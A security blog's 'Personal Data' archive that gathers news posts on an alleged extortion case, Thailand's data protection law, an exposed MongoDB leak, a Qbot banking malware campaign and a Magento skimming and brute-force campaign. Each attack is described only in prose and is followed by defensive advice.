Category Archives: Personal Data

Network chief allegedly tries to extort $750,000 from former employers

After getting fired from his job as a director of infrastructure services, a Statesville (NC) man decided to try an extort his employers by threatening to release customers’ private information to the mainstream.

Court papers don’t mention the name of the company where Matthew Moebius worked for, but they do say he worked there for 13 years, according to wsoctv.com. According to the filings, Moebius served as director of network infrastructure services for the company until his untimely departure in 2014. The reason for his firing also isn’t mentioned.

As the story goes, after getting canned, a disgruntled Moebius used an overseas encrypted email service to threaten senior executives with the release of customers’ private information. To refrain from doing so, Moebius allegedly demanded $750,000 from his former employers.

According to court papers, one of Moebious’s messages said, “Sorry to interrupt your boy scout canoeing trip. Reply or this goes to the next level now. You have no idea how much customer data will go to the internet, but you will if you delay. Name any client and get a data file in return.”

His threats fell on deaf ears, so a month later he emailed three company executives and included personally identifiable information for three customers.

“To Internet CC [company] customers or not. Keep [expletive] around and be destroyed. This is a tiny sample,” this email reportedly said.

Charged with extortion and identity theft, Moebius pleaded not guilty and requested that his case go to trial.

HOTforSecurity: Network chief allegedly tries to extort $750,000 from former employers

After getting fired from his job as a director of infrastructure services, a Statesville (NC) man decided to try an extort his employers by threatening to release customers’ private information to the mainstream.

Court papers don’t mention the name of the company where Matthew Moebius worked for, but they do say he worked there for 13 years, according to wsoctv.com. According to the filings, Moebius served as director of network infrastructure services for the company until his untimely departure in 2014. The reason for his firing also isn’t mentioned.

As the story goes, after getting canned, a disgruntled Moebius used an overseas encrypted email service to threaten senior executives with the release of customers’ private information. To refrain from doing so, Moebius allegedly demanded $750,000 from his former employers.

According to court papers, one of Moebious’s messages said, “Sorry to interrupt your boy scout canoeing trip. Reply or this goes to the next level now. You have no idea how much customer data will go to the internet, but you will if you delay. Name any client and get a data file in return.”

His threats fell on deaf ears, so a month later he emailed three company executives and included personally identifiable information for three customers.

“To Internet CC [company] customers or not. Keep [expletive] around and be destroyed. This is a tiny sample,” this email reportedly said.

Charged with extortion and identity theft, Moebius pleaded not guilty and requested that his case go to trial.



HOTforSecurity

Thailand’s National Legislative Assembly Passes Data Protection Law

On February 28, 2019, Thailand’s National Legislative Assembly finally approved and endorsed the draft Personal Data Protection Act (the “PDPA”), which will now be submitted for royal endorsement and subsequent publication in the Government Gazette. Publication is anticipated to occur within the next few weeks.

The PDPA provides for a one-year grace period, such that the operative provisions concerning personal data protection, rights of data subjects, complaints, civil liabilities and penalties will take force one year after publication in the Government Gazette. The aim is to allow sufficient time for business operators to prepare and implement internal controls and systems for PDPA compliance.

In crafting the PDPA, the Thai government has largely followed and replicated the provisions of the EU General Data Protection Regulation (“GDPR”). It did so deliberately, to demonstrate that Thailand has an “adequate” level of data protection to the EU and other countries requiring the same under their own laws.

Key Requirements of the PDPA

National Data Protection Authority

A Personal Data Protection Committee will be established to enforce compliance with the PDPA.

Extraterritorial Effect

The PDPA contains provisions that have explicit extraterritorial application, which is rare for Thai law and marks a significant shift between the PDPA and Thailand’s other legal frameworks. Specifically, the PDPA will apply to the collection, use or disclosure of personal data of a data subject in Thailand that is conducted by a data controller or data processor outside of Thailand, where such processing activities relate to the offering of goods or services or the monitoring of behavior of data subjects in Thailand. (This is generally in line with the “targeting” criteria under the GDPR.) As a result, businesses that did not previously need to consider the applicability of Thai data protection law to their processing activities may now be caught within the PDPA’s territorial scope.

Operative Terms

The term “data controller” is defined as a “natural or juristic person having the power to make decision on the collection, use or disclosure of Personal Data”; “data processor” is defined as a “natural or juristic person which collects, uses or discloses personal data in accordance with the instruction of or on behalf of the data controller, provided that such person or juristic person conducting those actions is not the data controller.” The term “personal data” is defined as “information relating to a person which is identifiable, directly or indirectly, excluding the information of a dead person.”

Consent

A data subject’s consent will be required for any collection, disclosure or use of personal data.

The PDPA requires that any such consent must be express, and in writing or made through an electronic system, unless its nature does not so allow.

Sensitive Personal Data

The PDPA establishes a separate category of “sensitive personal data” that includes personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, criminal record, trade union membership, genetic data, biometric data, data concerning health or data concerning a natural person’s sex life or sexual orientation, and prohibits the collection of sensitive personal data without express consent from the data subject, except in certain prescribed circumstances (e.g., medical emergency or as required by law).

Rights of Data Subject

A data subject is entitled to request access to his or her personal data, as well as submit requests to delete, destroy or anonymize his or her personal data.

Transfer of Personal Data

A data controller is expressly prohibited from disclosing or transferring personal data to third parties, except with the data subject’s consent (subject to certain limited, customary exceptions).

Where the transfer of personal data is being made to another country or an international organization outside of Thailand, such transfer may only take place where such country or international organization has an adequate level of protection—meaning, complies with the criteria for protection of personal data to be prescribed by the Personal Data Protection Committee—except for certain limited exceptions (including specific consent from the data subject to disclose to persons in a noncompliant country).

Civil and Criminal Liability

Violation of the PDPA can lead to both civil and criminal liabilities, including administrative fines.

More Than 2 Billion Unencrypted Records Exposed in Major Email Leak

A recent security incident that began as an email leak exposed more than 2 billion records containing email addresses and other personal information.

On Feb. 25, Security Discovery came across a MongoDB instance left unprotected by a password on the internet. Security researcher Bob Diachenko peered inside the exposed resource and discovered 150 GB of data, including just under 800 million email addresses. Some of the records also included personally identifiable information (PII) such as dates of birth, gender and phone numbers.

As it turned out, the scale of the incident was much larger than originally reported. Andrew Martin, CEO and founder of DynaRisk, told SC Media UK that his company’s analysis revealed how the security incident had exposed four databases, not just one. These databases contained a total of 2,069,145,043 records, with some of the files holding employment information among other pieces of data. DynaRisk also determined that all of the records were unencrypted at the time of exposure.

A Stream of MongoDB Security Events

This isn’t the only large data breach to make headlines in 2019. Near the beginning of the year, security researcher Troy Hunt revealed how the Collection #1 breach had exposed nearly 800 million email addresses and more than 21 million passwords. Shortly thereafter, PCWorld reported that the Collection #1 data breach was part of a larger set of security incidents. With the addition of Collections #2–#5, the “Collections” breaches exposed a total of 2.19 billion records.

The incident found by Security Discovery isn’t the only one to involve an unsecured MongoDB, either. In September 2018, for instance, Diachenko revealed how an unprotected MongoDB instance had exposed 11 million records. Several months later, ZDNet found that digital attackers were still holding unsecured MongoDB databases for ransom — two years after these types of security incidents first began.

How to Defend Against a MongoDB-Based Email Leak

Security professionals can help defend their organizations’ MongoDB databases from an email leak by tailoring data encryption to fit their needs, such as by combining storage-level encryption for performance and structured data encryption on certain high-risk apps. Organizations should also implement other MongoDB security best practices, which include enabling access control and auditing system activity.

The post More Than 2 Billion Unencrypted Records Exposed in Major Email Leak appeared first on Security Intelligence.

Attack Campaign Targets Organizations Worldwide With New Qbot Banking Malware Variant

Security researchers spotted a new attack campaign that’s targeting organizations in several countries with a new variant of Qbot banking malware.

In its investigation, Varonis found the campaign consists of phishing emails that come with an attached ZIP file using a .doc.vbs extension. Upon execution, the VBS script extracts information about the target machine’s operating system and attempts to check for strings associated with well-known antivirus software. It then uses the BITSAdmin tool to run a malware loader.

This loader, which has multiple versions signed with different digital certificates, creates a registry value, scheduled task and startup shortcut to establish persistence on the infected machine. It then launches a 32-bit explorer.exe file before injecting the main payload: a new variant of Qbot. This malware is capable of keylogging, stealing credentials/cookies from a web browser and hooking into running processes so it can latch onto users’ banking login information.

Qbot’s Adaptability in Recent Years

Varonis noted that the campaign is mostly targeting corporations located in the U.S., but it also has hit organizations around the world, including companies based in Europe, Asia and South America. Researchers analyzed the threat’s command-and-control (C&C) server and came across evidence suggesting that this Qbot campaign has already claimed thousands of victims.

This isn’t the first time Qbot has gone through some changes. For example, researchers at BAE Systems identified a variant back in April 2016 that incorporated polymorphic code, thereby making itself more difficult to detect. In November 2018, Alibaba Cloud Security uncovered a new version capable of performing brute-force attacks and enlisting infected hosts into a botnet.

How to Defend Against Banking Malware

Security professionals can help defend against banking malware like Qbot by using a unified endpoint management (UEM) platform to set up security policies and compliance rules that automate malware remediation. This step will help streamline the organization’s response capabilities in the event of a malware infection.

Additionally, security professionals should use a sophisticated anti-phishing solution that tracks which brands are under attack and uses machine learning to become proficient in evolving phishing tactics.

The post Attack Campaign Targets Organizations Worldwide With New Qbot Banking Malware Variant appeared first on Security Intelligence.

New Golang Brute-Forcer Targeting E-Commerce Sites to Steal Personal and Payment Data

Researchers discovered new Trojan malware written in Golang that’s targeting e-commerce websites with brute-force attacks.

Malwarebytes Labs recently analyzed a newly infected Magento website and found that attackers had injected malicious code into the site’s homepage so that it referenced an external piece of JavaScript. This code used a POST request to exfiltrate victims’ data to googletagmanager[.]eu when they entered their address and payment details.

In their investigation, Malwarebytes researchers found a connection between the compromised e-commerce website and a two-stage payload. The first stage consisted of a Delphi downloader detected as Trojan.Wallyshack. This threat collected basic information about the infected machine, transmitted the data to its command-and-control (C&C) server and ran Trojan.StealthWorker.GO, the second payload that communicated with the infected site. Written in Golang version 1.9, this malware sample contained several functions with the name “Brut” that it used for brute-forcing.

Connections to MageCart and the Rise of Golang Threats

While analyzing the infected website, Malwarebytes observed how this wasn’t the first time that googletagmanager[.]eu has surfaced in an attack campaign. In fact, researchers traced the domain back to criminal activities involving MageCart. This threat actor has affected more than 800 organizations by compromising their e-commerce websites and stealing customers’ payment card details, as noted by RiskIQ.

At the same time, this brute-forcer comes amid a rise of Golang-based digital threats. In January 2019, for example, Malwarebytes Labs detected Trojan.CryptoStealer.Go, an information stealer written in this budding programming language. Just a month before, researchers at Palo Alto Networks’ Unit 42 came across a Golang variant of Zebrocy, an attack tool used by the Sofacy threat group.

How Security Teams Can Defend Against Brute-Forcers

Security professionals can help defend against brute-force attacks by shielding their network perimeter against outside intrusion with firewalls and identity-based security such as identity and access management (IAM). Additionally, security teams should implement consistent software patching so they can close off known vulnerabilities.

The post New Golang Brute-Forcer Targeting E-Commerce Sites to Steal Personal and Payment Data appeared first on Security Intelligence.